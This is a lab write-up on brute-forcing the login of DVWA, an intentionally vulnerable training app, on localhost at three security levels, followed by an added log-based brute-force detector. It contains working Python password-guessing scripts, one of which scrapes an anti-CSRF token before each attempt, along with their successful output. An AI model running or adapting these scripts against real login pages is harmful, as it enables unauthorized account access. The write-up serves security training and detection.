low
URL:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=password&Login=Login
Construct the GET request directly to brute-force the login. Here a Python script runs through a weak-password dictionary:

import requests
import re

url1 = "http://localhost/DVWA/vulnerabilities/brute/?username=admin&password="
url2 = "&Login=Login"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Cookie": "security=low; JSESSIONID=502D644D0E431EF234144A4955105F21; PHPSESSID=i32i84kkipl66mci5onfam0h4e",
}

# Try each candidate from the weak-password dictionary in turn
with open('password.txt') as passFile:
    for item in passFile:
        url = url1 + item.strip() + url2
        print("try:" + url)
        response = requests.get(url, headers=headers)
        if response.status_code == 200:
            content = response.text
            # Analysing the responses shows that a failed login contains "password incorrect";
            # the response length, len(content), can also be used to tell success from failure
            pos = re.search('password incorrect', content)
            if pos is None:
                print("Success!")
                break
        else:
            print("request error code:" + str(response.status_code))

The output is as follows:
PS I:\pyscript\web> python .\DVWA_BF.py
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=123456&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=123456789&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=111111&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=5201314&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=12345678&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=123123&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=password&Login=Login
Success!
medium
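At this level, a failed login makes the back end pause for two seconds, which lengthens the time a brute-force attack needs. The script used for the low level still works; the attack just takes longer.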
high
This level adds an Anti-CSRF token, so the attack script first has to request the page to obtain the token and then send the login request with that token. The code is as follows:

import requests
import re

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Cookie": "security=high; JSESSIONID=502D644D0E431EF234144A4955105F21; PHPSESSID=i32i84kkipl66mci5onfam0h4e",
}

def AttackFun(password):
    url1 = "http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=" + password
    url2 = "&Login=Login&user_token="
    # Request the page first to obtain a fresh token
    res = requests.get("http://localhost/DVWA/vulnerabilities/brute/index.php", headers=headers)
    content = res.text
    # The 32-character token starts 8 characters (" value='") after the name attribute
    pos = re.search(r"name='user_token'", content).span()[1]
    token = content[pos+8:pos+40]
    # The token has been obtained above; the login request below sends it along
    url = url1 + url2 + token
    print(url)
    res = requests.get(url, headers=headers)
    if res.status_code == 200:
        content = res.text
        pos = re.search("password incorrect", content)
        if pos is None:
            print("Success")
    else:
        print("error code:" + str(res.status_code))

with open("password.txt") as passFile:
    for line in passFile:
        AttackFun(line.strip())
PS I:\pyscript\web> python .\DVWA_BF2.py
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=123456&Login=Login&user_token=ae66c04fb2438e4ef6c67efc1d38865f
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=123456789&Login=Login&user_token=f2ef72fdca774949e53ee67f42b2c232
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=111111&Login=Login&user_token=82b87786d461085a3ab6fa5cf37cb78a
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=5201314&Login=Login&user_token=a3a793863ab299618ca9d38e996cca68
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=12345678&Login=Login&user_token=fbec1f9ab611343209762fac3a801607
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=123123&Login=Login&user_token=34729acaffdc0e26113a5ffa237610fe
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=password&Login=Login&user_token=70d5d59ab290b9f4b4ac9f26ce3fd444
Success
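
Every attempt at all three levels is a GET request carrying the username and password in the query string, so the guessing is visible in the web server's access log. The following is an added example, not part of the original post: it flags a client that tries many distinct passwords for one username within a short window. The log lines, client IPs, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Apache/Nginx "combined"-style prefix: client IP, timestamp, request line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+"')
LOGIN_PATH = "/DVWA/vulnerabilities/brute/"

def detect_bruteforce(lines, max_distinct=5, window=timedelta(seconds=60)):
    """Return sorted (ip, username) pairs that tried more than max_distinct
    different passwords within window. Both thresholds are assumed values."""
    recent = defaultdict(deque)   # (ip, username) -> deque of (time, password)
    flagged = set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, stamp, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.startswith(LOGIN_PATH):
            continue
        query = parse_qs(parts.query)
        if "username" not in query or "password" not in query:
            continue  # plain page load (e.g. the token fetch), not a login attempt
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        key = (ip, query["username"][0])
        attempts = recent[key]
        attempts.append((when, query["password"][0]))
        while when - attempts[0][0] > window:   # drop attempts outside the window
            attempts.popleft()
        if len({pw for _, pw in attempts}) > max_distinct:
            flagged.add(key)
    return sorted(flagged)

def sample_line(ip, second, query):
    # Constructed log line for the demo; not taken from a real server
    return (f'{ip} - - [01/Jan/2024:10:00:{second:02d} +0000] '
            f'"GET {LOGIN_PATH}{query} HTTP/1.1" 200 4500')

WORDLIST = ["123456", "123456789", "111111", "5201314", "12345678", "123123", "password"]
SAMPLE_LOG = [sample_line("10.0.0.5", i, f"?username=admin&password={pw}&Login=Login")
              for i, pw in enumerate(WORDLIST)]
SAMPLE_LOG.append(sample_line("10.0.0.9", 30, "?username=admin&password=hunter2&Login=Login"))
SAMPLE_LOG.append(sample_line("10.0.0.9", 31, "index.php"))

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

The two-second delay of the medium level spreads the same requests over a longer period, so the window has to be sized for the slowest guessing rate that should still raise an alert.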